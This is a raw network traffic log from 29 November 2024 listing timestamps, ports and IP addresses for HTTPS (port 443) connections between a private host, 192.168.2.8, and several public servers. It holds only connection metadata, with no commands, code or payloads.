Nov 29, 2024 12:28:13.446484089 CET	443	49828	104.117.182.56	192.168.2.8
Nov 29, 2024 12:28:13.446505070 CET	443	49828	104.117.182.56	192.168.2.8
Nov 29, 2024 12:28:13.446546078 CET	49828	443	192.168.2.8	104.117.182.56
Nov 29, 2024 12:28:13.446557999 CET	443	49828	104.117.182.56	192.168.2.8
Nov 29, 2024 12:28:13.446585894 CET	49828	443	192.168.2.8	104.117.182.56
Nov 29, 2024 12:28:13.446608067 CET	49828	443	192.168.2.8	104.117.182.56
Nov 29, 2024 12:28:13.458144903 CET	49830	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:13.458163977 CET	443	49830	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:13.458966017 CET	443	49827	104.117.182.56	192.168.2.8
Nov 29, 2024 12:28:13.459059000 CET	443	49827	104.117.182.56	192.168.2.8
Nov 29, 2024 12:28:13.459067106 CET	49827	443	192.168.2.8	104.117.182.56
Nov 29, 2024 12:28:13.459103107 CET	49827	443	192.168.2.8	104.117.182.56
Nov 29, 2024 12:28:13.459439039 CET	49827	443	192.168.2.8	104.117.182.56
Nov 29, 2024 12:28:13.459458113 CET	443	49827	104.117.182.56	192.168.2.8
Nov 29, 2024 12:28:13.478868961 CET	49830	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:13.478887081 CET	443	49830	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:13.533071041 CET	443	49829	104.117.182.56	192.168.2.8
Nov 29, 2024 12:28:13.533101082 CET	443	49829	104.117.182.56	192.168.2.8
Nov 29, 2024 12:28:13.533175945 CET	49829	443	192.168.2.8	104.117.182.56
Nov 29, 2024 12:28:13.533209085 CET	443	49829	104.117.182.56	192.168.2.8
Nov 29, 2024 12:28:13.533236980 CET	49829	443	192.168.2.8	104.117.182.56
Nov 29, 2024 12:28:13.533256054 CET	49829	443	192.168.2.8	104.117.182.56
Nov 29, 2024 12:28:13.550399065 CET	443	49828	104.117.182.56	192.168.2.8
Nov 29, 2024 12:28:13.550446987 CET	443	49828	104.117.182.56	192.168.2.8
Nov 29, 2024 12:28:13.550467014 CET	49828	443	192.168.2.8	104.117.182.56
Nov 29, 2024 12:28:13.550487041 CET	443	49828	104.117.182.56	192.168.2.8
Nov 29, 2024 12:28:13.550523043 CET	49828	443	192.168.2.8	104.117.182.56
Nov 29, 2024 12:28:13.550529003 CET	443	49828	104.117.182.56	192.168.2.8
Nov 29, 2024 12:28:13.550537109 CET	49828	443	192.168.2.8	104.117.182.56
Nov 29, 2024 12:28:13.550573111 CET	49828	443	192.168.2.8	104.117.182.56
Nov 29, 2024 12:28:13.559288979 CET	49828	443	192.168.2.8	104.117.182.56
Nov 29, 2024 12:28:13.559304953 CET	443	49828	104.117.182.56	192.168.2.8
Nov 29, 2024 12:28:13.559883118 CET	443	49829	104.117.182.56	192.168.2.8
Nov 29, 2024 12:28:13.559912920 CET	443	49829	104.117.182.56	192.168.2.8
Nov 29, 2024 12:28:13.559978962 CET	49829	443	192.168.2.8	104.117.182.56
Nov 29, 2024 12:28:13.559993982 CET	443	49829	104.117.182.56	192.168.2.8
Nov 29, 2024 12:28:13.560022116 CET	49829	443	192.168.2.8	104.117.182.56
Nov 29, 2024 12:28:13.560045004 CET	49829	443	192.168.2.8	104.117.182.56
Nov 29, 2024 12:28:13.577056885 CET	443	49829	104.117.182.56	192.168.2.8
Nov 29, 2024 12:28:13.577131987 CET	49829	443	192.168.2.8	104.117.182.56
Nov 29, 2024 12:28:13.596806049 CET	443	49829	104.117.182.56	192.168.2.8
Nov 29, 2024 12:28:13.596838951 CET	443	49829	104.117.182.56	192.168.2.8
Nov 29, 2024 12:28:13.596878052 CET	49829	443	192.168.2.8	104.117.182.56
Nov 29, 2024 12:28:13.596890926 CET	443	49829	104.117.182.56	192.168.2.8
Nov 29, 2024 12:28:13.596920013 CET	49829	443	192.168.2.8	104.117.182.56
Nov 29, 2024 12:28:13.596935987 CET	49829	443	192.168.2.8	104.117.182.56
Nov 29, 2024 12:28:13.618231058 CET	443	49829	104.117.182.56	192.168.2.8
Nov 29, 2024 12:28:13.618253946 CET	443	49829	104.117.182.56	192.168.2.8
Nov 29, 2024 12:28:13.618295908 CET	49829	443	192.168.2.8	104.117.182.56
Nov 29, 2024 12:28:13.618305922 CET	443	49829	104.117.182.56	192.168.2.8
Nov 29, 2024 12:28:13.618334055 CET	49829	443	192.168.2.8	104.117.182.56
Nov 29, 2024 12:28:13.618352890 CET	49829	443	192.168.2.8	104.117.182.56
Nov 29, 2024 12:28:13.735318899 CET	443	49829	104.117.182.56	192.168.2.8
Nov 29, 2024 12:28:13.735389948 CET	49829	443	192.168.2.8	104.117.182.56
Nov 29, 2024 12:28:13.735400915 CET	443	49829	104.117.182.56	192.168.2.8
Nov 29, 2024 12:28:13.735416889 CET	443	49829	104.117.182.56	192.168.2.8
Nov 29, 2024 12:28:13.735465050 CET	49829	443	192.168.2.8	104.117.182.56
Nov 29, 2024 12:28:13.742136002 CET	49829	443	192.168.2.8	104.117.182.56
Nov 29, 2024 12:28:13.742150068 CET	443	49829	104.117.182.56	192.168.2.8
Nov 29, 2024 12:28:14.312005043 CET	49834	443	192.168.2.8	13.69.116.108
Nov 29, 2024 12:28:14.312057018 CET	443	49834	13.69.116.108	192.168.2.8
Nov 29, 2024 12:28:14.312135935 CET	49834	443	192.168.2.8	13.69.116.108
Nov 29, 2024 12:28:14.312650919 CET	49834	443	192.168.2.8	13.69.116.108
Nov 29, 2024 12:28:14.312670946 CET	443	49834	13.69.116.108	192.168.2.8
Nov 29, 2024 12:28:14.389723063 CET	49835	443	192.168.2.8	13.69.116.108
Nov 29, 2024 12:28:14.389772892 CET	443	49835	13.69.116.108	192.168.2.8
Nov 29, 2024 12:28:14.390021086 CET	49835	443	192.168.2.8	13.69.116.108
Nov 29, 2024 12:28:14.390312910 CET	49835	443	192.168.2.8	13.69.116.108
Nov 29, 2024 12:28:14.390327930 CET	443	49835	13.69.116.108	192.168.2.8
Nov 29, 2024 12:28:14.443811893 CET	443	49830	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:14.443866968 CET	443	49830	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:14.443943977 CET	49830	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:14.443943977 CET	49830	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:14.443980932 CET	443	49830	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:14.444039106 CET	443	49830	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:14.444278002 CET	49830	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:14.445260048 CET	49830	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:14.445275068 CET	443	49830	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:14.607851982 CET	49836	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:14.607918024 CET	443	49836	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:14.608092070 CET	49836	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:14.608274937 CET	49836	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:14.608289957 CET	443	49836	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:15.213700056 CET	443	49832	13.69.116.108	192.168.2.8
Nov 29, 2024 12:28:15.214308977 CET	49832	443	192.168.2.8	13.69.116.108
Nov 29, 2024 12:28:15.214340925 CET	443	49832	13.69.116.108	192.168.2.8
Nov 29, 2024 12:28:15.214768887 CET	443	49832	13.69.116.108	192.168.2.8
Nov 29, 2024 12:28:15.215274096 CET	49832	443	192.168.2.8	13.69.116.108
Nov 29, 2024 12:28:15.215379953 CET	443	49832	13.69.116.108	192.168.2.8
Nov 29, 2024 12:28:15.215529919 CET	49832	443	192.168.2.8	13.69.116.108
Nov 29, 2024 12:28:15.215656042 CET	49832	443	192.168.2.8	13.69.116.108
Nov 29, 2024 12:28:15.215682983 CET	443	49832	13.69.116.108	192.168.2.8
Nov 29, 2024 12:28:15.245666981 CET	443	49831	13.69.116.108	192.168.2.8
Nov 29, 2024 12:28:15.245907068 CET	443	49833	4.175.87.197	192.168.2.8
Nov 29, 2024 12:28:15.246012926 CET	49833	443	192.168.2.8	4.175.87.197
Nov 29, 2024 12:28:15.247781038 CET	49833	443	192.168.2.8	4.175.87.197
Nov 29, 2024 12:28:15.247792006 CET	443	49833	4.175.87.197	192.168.2.8
Nov 29, 2024 12:28:15.247811079 CET	49831	443	192.168.2.8	13.69.116.108
Nov 29, 2024 12:28:15.247824907 CET	443	49831	13.69.116.108	192.168.2.8
Nov 29, 2024 12:28:15.248025894 CET	443	49833	4.175.87.197	192.168.2.8
Nov 29, 2024 12:28:15.248256922 CET	443	49831	13.69.116.108	192.168.2.8
Nov 29, 2024 12:28:15.256256104 CET	49833	443	192.168.2.8	4.175.87.197
Nov 29, 2024 12:28:15.256623030 CET	49831	443	192.168.2.8	13.69.116.108
Nov 29, 2024 12:28:15.256740093 CET	443	49831	13.69.116.108	192.168.2.8
Nov 29, 2024 12:28:15.256988049 CET	49831	443	192.168.2.8	13.69.116.108
Nov 29, 2024 12:28:15.257183075 CET	49831	443	192.168.2.8	13.69.116.108
Nov 29, 2024 12:28:15.257216930 CET	443	49831	13.69.116.108	192.168.2.8
Nov 29, 2024 12:28:15.303340912 CET	443	49833	4.175.87.197	192.168.2.8
Nov 29, 2024 12:28:15.556195021 CET	49731	443	192.168.2.8	23.206.229.226
Nov 29, 2024 12:28:15.556241989 CET	443	49731	23.206.229.226	192.168.2.8
Nov 29, 2024 12:28:15.556341887 CET	49731	443	192.168.2.8	23.206.229.226
Nov 29, 2024 12:28:15.556350946 CET	443	49731	23.206.229.226	192.168.2.8
Nov 29, 2024 12:28:15.556958914 CET	49837	443	192.168.2.8	23.206.229.226
Nov 29, 2024 12:28:15.557010889 CET	443	49837	23.206.229.226	192.168.2.8
Nov 29, 2024 12:28:15.557087898 CET	49837	443	192.168.2.8	23.206.229.226
Nov 29, 2024 12:28:15.557467937 CET	49837	443	192.168.2.8	23.206.229.226
Nov 29, 2024 12:28:15.557524920 CET	443	49837	23.206.229.226	192.168.2.8
Nov 29, 2024 12:28:15.557806015 CET	49837	443	192.168.2.8	23.206.229.226
Nov 29, 2024 12:28:15.666382074 CET	443	49831	13.69.116.108	192.168.2.8
Nov 29, 2024 12:28:15.666501045 CET	443	49831	13.69.116.108	192.168.2.8
Nov 29, 2024 12:28:15.666595936 CET	49831	443	192.168.2.8	13.69.116.108
Nov 29, 2024 12:28:15.667337894 CET	49831	443	192.168.2.8	13.69.116.108
Nov 29, 2024 12:28:15.667357922 CET	443	49831	13.69.116.108	192.168.2.8
Nov 29, 2024 12:28:15.852612972 CET	443	49832	13.69.116.108	192.168.2.8
Nov 29, 2024 12:28:15.852709055 CET	443	49832	13.69.116.108	192.168.2.8
Nov 29, 2024 12:28:15.852828026 CET	49832	443	192.168.2.8	13.69.116.108
Nov 29, 2024 12:28:15.853562117 CET	49832	443	192.168.2.8	13.69.116.108
Nov 29, 2024 12:28:15.853586912 CET	443	49832	13.69.116.108	192.168.2.8
Nov 29, 2024 12:28:15.966602087 CET	443	49833	4.175.87.197	192.168.2.8
Nov 29, 2024 12:28:15.966629028 CET	443	49833	4.175.87.197	192.168.2.8
Nov 29, 2024 12:28:15.966679096 CET	443	49833	4.175.87.197	192.168.2.8
Nov 29, 2024 12:28:15.966711044 CET	49833	443	192.168.2.8	4.175.87.197
Nov 29, 2024 12:28:15.966746092 CET	443	49833	4.175.87.197	192.168.2.8
Nov 29, 2024 12:28:15.966763020 CET	49833	443	192.168.2.8	4.175.87.197
Nov 29, 2024 12:28:15.966794014 CET	49833	443	192.168.2.8	4.175.87.197
Nov 29, 2024 12:28:16.007589102 CET	443	49833	4.175.87.197	192.168.2.8
Nov 29, 2024 12:28:16.007641077 CET	443	49833	4.175.87.197	192.168.2.8
Nov 29, 2024 12:28:16.007673979 CET	49833	443	192.168.2.8	4.175.87.197
Nov 29, 2024 12:28:16.007688046 CET	443	49833	4.175.87.197	192.168.2.8
Nov 29, 2024 12:28:16.007699013 CET	443	49833	4.175.87.197	192.168.2.8
Nov 29, 2024 12:28:16.007731915 CET	49833	443	192.168.2.8	4.175.87.197
Nov 29, 2024 12:28:16.007751942 CET	49833	443	192.168.2.8	4.175.87.197
Nov 29, 2024 12:28:16.007934093 CET	49833	443	192.168.2.8	4.175.87.197
Nov 29, 2024 12:28:16.007951975 CET	443	49833	4.175.87.197	192.168.2.8
Nov 29, 2024 12:28:16.007973909 CET	49833	443	192.168.2.8	4.175.87.197
Nov 29, 2024 12:28:16.007981062 CET	443	49833	4.175.87.197	192.168.2.8
Nov 29, 2024 12:28:16.065566063 CET	443	49834	13.69.116.108	192.168.2.8
Nov 29, 2024 12:28:16.066229105 CET	49834	443	192.168.2.8	13.69.116.108
Nov 29, 2024 12:28:16.066246986 CET	443	49834	13.69.116.108	192.168.2.8
Nov 29, 2024 12:28:16.067300081 CET	443	49834	13.69.116.108	192.168.2.8
Nov 29, 2024 12:28:16.067368031 CET	49834	443	192.168.2.8	13.69.116.108
Nov 29, 2024 12:28:16.067651987 CET	49834	443	192.168.2.8	13.69.116.108
Nov 29, 2024 12:28:16.067713976 CET	443	49834	13.69.116.108	192.168.2.8
Nov 29, 2024 12:28:16.067826033 CET	49834	443	192.168.2.8	13.69.116.108
Nov 29, 2024 12:28:16.067882061 CET	49834	443	192.168.2.8	13.69.116.108
Nov 29, 2024 12:28:16.067893028 CET	443	49834	13.69.116.108	192.168.2.8
Nov 29, 2024 12:28:16.075752974 CET	443	49836	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:16.075839996 CET	49836	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:16.076303959 CET	49836	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:16.076314926 CET	443	49836	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:16.101950884 CET	49836	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:16.101973057 CET	443	49836	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:16.101988077 CET	49836	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:16.101996899 CET	443	49836	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:16.112229109 CET	49834	443	192.168.2.8	13.69.116.108
Nov 29, 2024 12:28:16.147422075 CET	443	49835	13.69.116.108	192.168.2.8
Nov 29, 2024 12:28:16.147665024 CET	49835	443	192.168.2.8	13.69.116.108
Nov 29, 2024 12:28:16.147686958 CET	443	49835	13.69.116.108	192.168.2.8
Nov 29, 2024 12:28:16.149154902 CET	443	49835	13.69.116.108	192.168.2.8
Nov 29, 2024 12:28:16.149235964 CET	49835	443	192.168.2.8	13.69.116.108
Nov 29, 2024 12:28:16.149604082 CET	49835	443	192.168.2.8	13.69.116.108
Nov 29, 2024 12:28:16.149686098 CET	443	49835	13.69.116.108	192.168.2.8
Nov 29, 2024 12:28:16.149771929 CET	49835	443	192.168.2.8	13.69.116.108
Nov 29, 2024 12:28:16.149836063 CET	49835	443	192.168.2.8	13.69.116.108
Nov 29, 2024 12:28:16.149847031 CET	443	49835	13.69.116.108	192.168.2.8
Nov 29, 2024 12:28:16.190417051 CET	49835	443	192.168.2.8	13.69.116.108
Nov 29, 2024 12:28:16.661071062 CET	443	49834	13.69.116.108	192.168.2.8
Nov 29, 2024 12:28:16.661144018 CET	443	49834	13.69.116.108	192.168.2.8
Nov 29, 2024 12:28:16.661209106 CET	49834	443	192.168.2.8	13.69.116.108
Nov 29, 2024 12:28:16.661674976 CET	49834	443	192.168.2.8	13.69.116.108
Nov 29, 2024 12:28:16.661694050 CET	443	49834	13.69.116.108	192.168.2.8
Nov 29, 2024 12:28:16.802664042 CET	443	49835	13.69.116.108	192.168.2.8
Nov 29, 2024 12:28:16.802776098 CET	443	49835	13.69.116.108	192.168.2.8
Nov 29, 2024 12:28:16.802829981 CET	49835	443	192.168.2.8	13.69.116.108
Nov 29, 2024 12:28:16.803327084 CET	49835	443	192.168.2.8	13.69.116.108
Nov 29, 2024 12:28:16.803339958 CET	443	49835	13.69.116.108	192.168.2.8
Nov 29, 2024 12:28:16.803355932 CET	49835	443	192.168.2.8	13.69.116.108
Nov 29, 2024 12:28:16.803385019 CET	49835	443	192.168.2.8	13.69.116.108
Nov 29, 2024 12:28:17.196954012 CET	443	49836	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:17.197041035 CET	49836	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:17.197072983 CET	443	49836	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:17.197118044 CET	443	49836	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:17.197185040 CET	49836	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:17.198152065 CET	49836	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:17.198169947 CET	443	49836	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:17.322989941 CET	443	49787	162.159.61.3	192.168.2.8
Nov 29, 2024 12:28:17.323071957 CET	443	49787	162.159.61.3	192.168.2.8
Nov 29, 2024 12:28:17.323153019 CET	49787	443	192.168.2.8	162.159.61.3
Nov 29, 2024 12:28:17.361504078 CET	443	49788	162.159.61.3	192.168.2.8
Nov 29, 2024 12:28:17.361584902 CET	443	49788	162.159.61.3	192.168.2.8
Nov 29, 2024 12:28:17.361730099 CET	49788	443	192.168.2.8	162.159.61.3
Nov 29, 2024 12:28:17.388379097 CET	443	49790	172.64.41.3	192.168.2.8
Nov 29, 2024 12:28:17.388451099 CET	443	49790	172.64.41.3	192.168.2.8
Nov 29, 2024 12:28:17.389040947 CET	49790	443	192.168.2.8	172.64.41.3
Nov 29, 2024 12:28:17.425350904 CET	443	49789	172.64.41.3	192.168.2.8
Nov 29, 2024 12:28:17.425442934 CET	443	49789	172.64.41.3	192.168.2.8
Nov 29, 2024 12:28:17.425545931 CET	49789	443	192.168.2.8	172.64.41.3
Nov 29, 2024 12:28:17.581711054 CET	49838	443	192.168.2.8	23.219.161.135
Nov 29, 2024 12:28:17.581756115 CET	443	49838	23.219.161.135	192.168.2.8
Nov 29, 2024 12:28:17.581963062 CET	49838	443	192.168.2.8	23.219.161.135
Nov 29, 2024 12:28:17.582140923 CET	49838	443	192.168.2.8	23.219.161.135
Nov 29, 2024 12:28:17.582158089 CET	443	49838	23.219.161.135	192.168.2.8
Nov 29, 2024 12:28:17.629986048 CET	49839	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:17.630038023 CET	443	49839	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:17.630333900 CET	49839	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:17.630676031 CET	49839	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:17.630691051 CET	443	49839	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:18.065505981 CET	443	49811	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:18.065591097 CET	443	49811	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:18.065591097 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:18.065723896 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:18.066553116 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:18.066574097 CET	443	49811	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:18.678867102 CET	49840	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:18.678911924 CET	443	49840	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:18.679128885 CET	49840	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:18.679383993 CET	49840	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:18.679394960 CET	443	49840	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:18.688920021 CET	49787	443	192.168.2.8	162.159.61.3
Nov 29, 2024 12:28:18.688932896 CET	49788	443	192.168.2.8	162.159.61.3
Nov 29, 2024 12:28:18.688947916 CET	443	49787	162.159.61.3	192.168.2.8
Nov 29, 2024 12:28:18.688955069 CET	443	49788	162.159.61.3	192.168.2.8
Nov 29, 2024 12:28:18.689220905 CET	49841	443	192.168.2.8	104.117.182.56
Nov 29, 2024 12:28:18.689260006 CET	443	49841	104.117.182.56	192.168.2.8
Nov 29, 2024 12:28:18.689471006 CET	49841	443	192.168.2.8	104.117.182.56
Nov 29, 2024 12:28:18.689650059 CET	49841	443	192.168.2.8	104.117.182.56
Nov 29, 2024 12:28:18.689666986 CET	443	49841	104.117.182.56	192.168.2.8
Nov 29, 2024 12:28:18.892304897 CET	443	49838	23.219.161.135	192.168.2.8
Nov 29, 2024 12:28:18.892627954 CET	49838	443	192.168.2.8	23.219.161.135
Nov 29, 2024 12:28:18.892663002 CET	443	49838	23.219.161.135	192.168.2.8
Nov 29, 2024 12:28:18.893757105 CET	443	49838	23.219.161.135	192.168.2.8
Nov 29, 2024 12:28:18.893826962 CET	49838	443	192.168.2.8	23.219.161.135
Nov 29, 2024 12:28:18.895011902 CET	49838	443	192.168.2.8	23.219.161.135
Nov 29, 2024 12:28:18.895072937 CET	49838	443	192.168.2.8	23.219.161.135
Nov 29, 2024 12:28:18.895076990 CET	443	49838	23.219.161.135	192.168.2.8
Nov 29, 2024 12:28:18.939332962 CET	443	49838	23.219.161.135	192.168.2.8
Nov 29, 2024 12:28:18.945893049 CET	49838	443	192.168.2.8	23.219.161.135
Nov 29, 2024 12:28:18.945919037 CET	443	49838	23.219.161.135	192.168.2.8
Nov 29, 2024 12:28:18.992285013 CET	49838	443	192.168.2.8	23.219.161.135
Nov 29, 2024 12:28:19.051733017 CET	443	49839	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:19.051799059 CET	49839	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:19.052248955 CET	49839	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:19.052257061 CET	443	49839	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:19.077328920 CET	49839	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:19.077358007 CET	443	49839	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:19.077380896 CET	49839	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:19.077395916 CET	443	49839	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:19.365351915 CET	443	49838	23.219.161.135	192.168.2.8
Nov 29, 2024 12:28:19.398845911 CET	443	49838	23.219.161.135	192.168.2.8
Nov 29, 2024 12:28:19.398860931 CET	443	49838	23.219.161.135	192.168.2.8
Nov 29, 2024 12:28:19.398893118 CET	443	49838	23.219.161.135	192.168.2.8
Nov 29, 2024 12:28:19.398907900 CET	443	49838	23.219.161.135	192.168.2.8
Nov 29, 2024 12:28:19.398916960 CET	49838	443	192.168.2.8	23.219.161.135
Nov 29, 2024 12:28:19.398947001 CET	443	49838	23.219.161.135	192.168.2.8
Nov 29, 2024 12:28:19.398967028 CET	49838	443	192.168.2.8	23.219.161.135
Nov 29, 2024 12:28:19.398981094 CET	443	49838	23.219.161.135	192.168.2.8
Nov 29, 2024 12:28:19.399091959 CET	49838	443	192.168.2.8	23.219.161.135
Nov 29, 2024 12:28:19.400245905 CET	49838	443	192.168.2.8	23.219.161.135
Nov 29, 2024 12:28:19.400260925 CET	443	49838	23.219.161.135	192.168.2.8
Nov 29, 2024 12:28:19.646306038 CET	49790	443	192.168.2.8	172.64.41.3
Nov 29, 2024 12:28:19.646320105 CET	443	49790	172.64.41.3	192.168.2.8
Nov 29, 2024 12:28:19.646439075 CET	49789	443	192.168.2.8	172.64.41.3
Nov 29, 2024 12:28:19.646450996 CET	443	49789	172.64.41.3	192.168.2.8
Nov 29, 2024 12:28:19.945699930 CET	443	49841	104.117.182.56	192.168.2.8
Nov 29, 2024 12:28:19.950031042 CET	49841	443	192.168.2.8	104.117.182.56
Nov 29, 2024 12:28:19.950057983 CET	443	49841	104.117.182.56	192.168.2.8
Nov 29, 2024 12:28:19.951188087 CET	443	49841	104.117.182.56	192.168.2.8
Nov 29, 2024 12:28:19.951368093 CET	49841	443	192.168.2.8	104.117.182.56
Nov 29, 2024 12:28:19.951565027 CET	49841	443	192.168.2.8	104.117.182.56
Nov 29, 2024 12:28:19.951631069 CET	443	49841	104.117.182.56	192.168.2.8
Nov 29, 2024 12:28:19.951756001 CET	49841	443	192.168.2.8	104.117.182.56
Nov 29, 2024 12:28:19.995330095 CET	443	49841	104.117.182.56	192.168.2.8
Nov 29, 2024 12:28:20.002868891 CET	49841	443	192.168.2.8	104.117.182.56
Nov 29, 2024 12:28:20.002883911 CET	443	49841	104.117.182.56	192.168.2.8
Nov 29, 2024 12:28:20.049712896 CET	49841	443	192.168.2.8	104.117.182.56
Nov 29, 2024 12:28:20.171457052 CET	443	49839	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:20.171545029 CET	443	49839	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:20.171694040 CET	49839	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:20.172894955 CET	49839	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:20.172919035 CET	443	49839	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:20.192579985 CET	443	49840	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:20.193788052 CET	49840	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:20.194390059 CET	49840	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:20.194401979 CET	443	49840	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:20.219619036 CET	49840	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:20.219641924 CET	443	49840	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:20.219708920 CET	49840	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:20.219716072 CET	443	49840	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:20.391599894 CET	443	49841	104.117.182.56	192.168.2.8
Nov 29, 2024 12:28:20.391628027 CET	443	49841	104.117.182.56	192.168.2.8
Nov 29, 2024 12:28:20.391696930 CET	443	49841	104.117.182.56	192.168.2.8
Nov 29, 2024 12:28:20.391875029 CET	49841	443	192.168.2.8	104.117.182.56
Nov 29, 2024 12:28:20.394881010 CET	49841	443	192.168.2.8	104.117.182.56
Nov 29, 2024 12:28:20.394896030 CET	443	49841	104.117.182.56	192.168.2.8
Nov 29, 2024 12:28:20.400454998 CET	49844	443	192.168.2.8	104.117.182.56
Nov 29, 2024 12:28:20.400489092 CET	443	49844	104.117.182.56	192.168.2.8
Nov 29, 2024 12:28:20.400574923 CET	49844	443	192.168.2.8	104.117.182.56
Nov 29, 2024 12:28:20.400779009 CET	49844	443	192.168.2.8	104.117.182.56
Nov 29, 2024 12:28:20.400790930 CET	443	49844	104.117.182.56	192.168.2.8
Nov 29, 2024 12:28:20.670368910 CET	443	49773	2.16.158.35	192.168.2.8
Nov 29, 2024 12:28:20.670445919 CET	443	49773	2.16.158.35	192.168.2.8
Nov 29, 2024 12:28:20.670695066 CET	49773	443	192.168.2.8	2.16.158.35
Nov 29, 2024 12:28:20.692457914 CET	49845	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:20.692509890 CET	443	49845	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:20.692608118 CET	49845	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:20.692922115 CET	49845	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:20.692936897 CET	443	49845	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:21.317917109 CET	443	49840	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:21.318020105 CET	443	49840	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:21.318295002 CET	49840	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:21.319271088 CET	49840	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:21.319292068 CET	443	49840	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:21.615989923 CET	443	49844	104.117.182.56	192.168.2.8
Nov 29, 2024 12:28:21.616341114 CET	49844	443	192.168.2.8	104.117.182.56
Nov 29, 2024 12:28:21.616374969 CET	443	49844	104.117.182.56	192.168.2.8
Nov 29, 2024 12:28:21.616719961 CET	443	49844	104.117.182.56	192.168.2.8
Nov 29, 2024 12:28:21.617216110 CET	49844	443	192.168.2.8	104.117.182.56
Nov 29, 2024 12:28:21.617281914 CET	443	49844	104.117.182.56	192.168.2.8
Nov 29, 2024 12:28:21.617439985 CET	49844	443	192.168.2.8	104.117.182.56
Nov 29, 2024 12:28:21.663330078 CET	443	49844	104.117.182.56	192.168.2.8
Nov 29, 2024 12:28:21.698898077 CET	49846	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:21.698954105 CET	443	49846	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:21.699028969 CET	49846	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:21.699290991 CET	49846	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:21.699302912 CET	443	49846	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:22.062771082 CET	443	49844	104.117.182.56	192.168.2.8
Nov 29, 2024 12:28:22.062798977 CET	443	49844	104.117.182.56	192.168.2.8
Nov 29, 2024 12:28:22.062877893 CET	443	49844	104.117.182.56	192.168.2.8
Nov 29, 2024 12:28:22.062947035 CET	49844	443	192.168.2.8	104.117.182.56
Nov 29, 2024 12:28:22.063107967 CET	49844	443	192.168.2.8	104.117.182.56
